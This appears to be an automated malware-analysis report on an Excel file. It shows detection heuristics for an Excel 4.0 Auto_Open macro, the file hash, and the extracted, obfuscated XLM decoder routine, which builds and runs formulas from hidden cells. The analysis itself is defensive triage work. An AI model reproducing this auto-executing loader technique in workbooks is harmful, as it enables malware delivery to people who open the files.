MALICIOUS
Risk Score: 140
Heuristics (3)
- Excel 4.0 Auto_Open defined name | critical | OLE_XLM_AUTOOPEN_DEFINEDNAME
  oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- XLM Auto_Open with dangerous formula APIs | critical | OLE_XLM_DANGEROUS_FN
  Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
- Excel 4.0 (XLM) macro sheet present | medium | OLE_XLM_AUTOOPEN
  Workbook contains an Excel 4.0 macro sheet sub-stream; XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6458 bytes |

SHA-256: 23352f36a42d8cce8faf63b9449a16d45b292bba95d6700383a1a428995a7600

Preview script (first 1,000 lines of the extracted script):
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - ptRF
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!I159
' 0018 23 LABEL : Cell Value, String Constant - CtnKiHBk len=0
' 0018 23 LABEL : Cell Value, String Constant - cxGbyyeg len=0
' 0018 20 LABEL : Cell Value, String Constant - eIczB len=0
' 0018 21 LABEL : Cell Value, String Constant - GetKUz len=0
' 0018 20 LABEL : Cell Value, String Constant - iyVyR len=0
' 0018 25 LABEL : Cell Value, String Constant - mrCAOeNLYk len=0
' 0018 27 LABEL : Cell Value, String Constant - ncJebQoWhuqt len=0
' 0018 23 LABEL : Cell Value, String Constant - OPyUuTSN len=0
' 0018 27 LABEL : Cell Value, String Constant - qCutIHJjFyKr len=0
' 0018 20 LABEL : Cell Value, String Constant - qWpuI len=0
' 0018 20 LABEL : Cell Value, String Constant - QzXbJ len=0
' 0018 22 LABEL : Cell Value, String Constant - rQigUws len=0
' 0018 20 LABEL : Cell Value, String Constant - sYXgX len=0
' 0018 23 LABEL : Cell Value, String Constant - tLTgZbXu len=0
' 0018 25 LABEL : Cell Value, String Constant - uqfZPBhjSZ len=0
' 0018 22 LABEL : Cell Value, String Constant - VOTZhzL len=0
' 0018 25 LABEL : Cell Value, String Constant - vZOQzHaUYw len=0
' 0018 21 LABEL : Cell Value, String Constant - wFlYrm len=0
' 0018 21 LABEL : Cell Value, String Constant - xQprTQ len=0
' 0018 20 LABEL : Cell Value, String Constant - yrHeE len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' ptRF,I65,"SET.NAME("cxGbyyeg",VALUE("0"))",""
' ptRF,I70,"SET.NAME("iyVyR",cxGbyyeg)",""
' ptRF,I74,"SET.NAME("VOTZhzL",cxGbyyeg)",""
' ptRF,I79,"SET.NAME("rQigUws",COUNTA(sYXgX))",""
' ptRF,I82,"SET.NAME("tLTgZbXu",COUNTA(qWpuI))",""
' ptRF,I86,[],""
' ptRF,I88,"SET.NAME("vZOQzHaUYw","")",""
' ptRF,I92,"iyVyR",""
' ptRF,I94,"SET.NAME("wFlYrm",HLOOKUP("*",sYXgX,iyVyR,FALSE))",""
' ptRF,I99,"mrCAOeNLYk",""
' ptRF,I102,"SET.NAME("qCutIHJjFyKr",cxGbyyeg)",""
' ptRF,I104,[],""
' ptRF,I108,"qCutIHJjFyKr",""
' ptRF,I111,"eIczB",""
' ptRF,I115,"OPyUuTSN",""
' ptRF,I117,"CtnKiHBk",""
' ptRF,I121,"SET.NAME("QzXbJ",VALUE(HLOOKUP("*",qWpuI,CtnKiHBk,FALSE)))",""
' ptRF,I126,"yrHeE",""
' ptRF,I128,"vZOQzHaUYw",""
' ptRF,I132,"VOTZhzL",""
' ptRF,I136,NEXT(),""
' ptRF,I140,"xQprTQ",""
' ptRF,I143,"SET.NAME("f",INT(T(FORMULA(T(vZOQzHaUYw)&"",""&T(xQprTQ)))))",""
' ptRF,I147,"ncJebQoWhuqt",""
' ptRF,I149,NEXT(),""
' ptRF,I154,RETURN(),""
' ptRF,I187,"SET.NAME("GetKUz",I65)",""
' ptRF,I191,"sYXgX",""
' ptRF,I194,"SET.NAME("qWpuI",R40C13)",""
' ptRF,I199,"SET.NAME("ncJebQoWhuqt",207)",""
' ptRF,I202,"SET.NAME("uqfZPBhjSZ",9)",""
' ptRF,I206,GetKUz(),""
' ptRF,I207,HALT(),""